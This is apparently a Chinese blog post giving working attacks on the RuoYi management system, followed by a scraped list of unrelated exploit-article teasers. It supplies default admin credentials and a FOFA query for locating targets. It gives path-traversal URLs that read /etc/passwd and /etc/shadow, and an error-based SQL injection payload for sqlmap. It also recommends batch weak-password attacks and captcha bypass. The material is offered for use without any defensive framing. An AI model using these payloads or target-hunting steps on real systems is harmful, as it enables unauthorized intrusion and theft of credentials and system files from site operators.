若依(RuoYi)管理系统 后台任意文件读取,SQL注入

一、若依管理系统简介

基于SpringBoot的权限管理系统 易读易懂、界面简洁美观。 核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用

二、若依管理系统后台任意文件下载

该漏洞需要登陆后台后进行测试,该管理系统多为默认账户密码

fofa搜索语句:app=”若依-管理系统”

账号:admin

密码:admin123

登陆成功后直接访问

http://目标网站url/common/download/resource?resource=/profile/../../../../etc/passwd
http://目标网站url//common/download/resource?resource=/profile/../../../../etc/shadow

三、若依管理系统SQL注入漏洞

该漏洞需要登陆后台后进行测试,该管理系统多为默认账户密码

直接burp抓包构造POST请求数据包(构建关键点)

1.POST请求

2.请求目录/system/role/list

3.请求POC(见下文)

POC:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and
extractvalue(1,concat(0x7e,substring((*),1,32),0x7e))

POC我直接写的星号指定注入位置,可以直接放到sqlmap中去跑,不指定位置sqlmap跑不出来(可能是我太笨了)

ps:有兴趣的同学可以写个脚本去跑(大佬和小白就不用看了,闲人专享)

简单思路可以先去批量去跑弱口令,这个很快,验证码是可以通过验证码识别网站去绕过的,登陆到后台之后构建请求包,博主已经实现了,代码过于杂乱就不分享了。

若依管理系统漏洞利用相关推荐

  1. 利用新云网站管理系统漏洞成功获取某大型书店Webshell

    利用新云网站管理系统漏洞成功获取某大型书店Webshell 声明:本文仅做安全技术研究,请勿用来做违法事! 通过本文可以学到: ①了解新云网站管理系统 ②利用新云网站管理系统存在的SQL注入漏洞.文件 ...

  2. mysql 渗透及漏洞利用总结

    Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP.和WAMP等,在针对网站渗透中,很 ...

  3. linux etc 漏洞利用,漏洞利用 | 看我如何利用Kerberos EoP渗透你的Linux系统

    写在前面的话 在一次红队分析中,我们成功以非特权用户的身份在一个外围网页中实现了命令执行.本文将介绍并分析漏洞(CVE-2018-1685)以及该漏洞的利用方式,该漏洞允许攻击者读取目标主机中的任意文 ...

  4. phpcms2008网站漏洞如何修复 远程代码写入缓存漏洞利用

    SINE安全公司在对phpcms2008网站代码进行安全检测与审计的时候发现该phpcms存在远程代码写入缓存文件的一个SQL注入漏洞,该phpcms漏洞危害较大,可以导致网站被黑,以及服务器遭受黑客 ...

  5. Botnet趋势漏洞利用状况分析

    执行摘要 在过去的一年中,世界遭受了新冠疫情的袭击,生产生活受到了极大的影响.但在网络世界中,僵 尸网络作为多年来的主要威胁形式之一,并未受到疫情的影响,反而更加活.今年,绿盟科技和国家 互联网 应急 ...

  6. 护卫神mysql提权_护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机管理一键安装的软件)...

    "护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机.SQL Server和 ...

  7. 护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机管理一键安装的软件)

    "护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机.SQL Server和 ...

  8. (23)【漏洞利用】【原理、利用过程】中间件解析漏洞、CMS漏洞、编辑器漏洞、CVE漏洞

    目录 解析漏洞: 原理: 变化因素: 熟知的中间件(解析漏洞) 0x01    IIS5.x-6.x解析漏洞: (1)目录解析漏洞(IIS6.0) 原理: 利用过程: (2)文件解析漏洞 原理: 利用 ...

  9. 常见端口漏洞利用总结

    21端口渗透剖析 FTP通常用作对远程服务器进行管理,典型应用就是对web系统进行管理.一旦FTP密码泄露就直接威胁web系统安全,甚至黑客通过提权可以直接控制服务器.这里剖析渗透FTP服务器的几种方 ...

  10. 行走的漏洞利用机器人:僵尸网络病毒携71个EXP占领高地

    前言 僵尸网络 Botnet 是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序)病毒,从而在控制者和被感染主机之间所形成的一个可一对多控制的网络. 攻击者通过各种途径传播僵尸程序感染互联 ...

最新文章

  1. java swing setborder_Swing编程边框(Border)的用法总结
  2. linux 驱动 内核模式,Linux内核模块和驱动的编写
  3. thinkphp5的目录结构和命名规范
  4. niginx查看服务器日志信息,nginx 远程日志服务器
  5. 八. 输入输出(IO)操作3.面向字符的输出流
  6. Python之pandas:pandas中缺失值与空值处理的简介及常用函数(drop()、dropna()、isna()、isnull()、fillna())函数详解之详细攻略
  7. 《集体智慧编程》数学公式
  8. 封校大学生无聊玩起图像大找茬——游戏脚本(一起领略Python脚本的风采吧)
  9. 夜天之书 #34 企业如何实践开源协同
  10. STC8H开发(十四): I2C驱动RX8025T高精度实时时钟芯片
  11. 密码:大写字母 小写字母 数字 特殊字符(四种里至少三种)
  12. C# WPF – 利用“Attached Property” 把 RoutedEvent 接上 ICommand
  13. 静态创意和动态创意_8种独特且价格合理的名片的创意
  14. python适合做网站吗_零基础学python—做网站
  15. KBL410-ASEMI整流桥KBL410
  16. 前端角度出发做好SEO需要考虑什么?
  17. iOS端的UI设计文档
  18. Android常用颜色大全
  19. bzoj1001/BJOI2006 狼抓兔子
  20. DSP28335通过FFT变换实现高频滤波

热门文章

  1. Kali 实现ARP断网攻击_arp断网攻击_arp欺骗
  2. VS2008简体中文版下载
  3. 墨画子卿第三章:初心第1节:上元灯会
  4. 编程语言的分类,以及网络瓶颈效应
  5. 山寨google, 新做了1个网站 googler.cc ,做的很山寨 喜欢的朋友可以去看看哈
  6. eclipse 自动生成注释 @author
  7. pycharm配色方案
  8. 澳洲网:澳高考生扎堆申请专业 热衷艺术及护理学位
  9. arcgis制作超链接
  10. cls love even fib!(打表,找规律)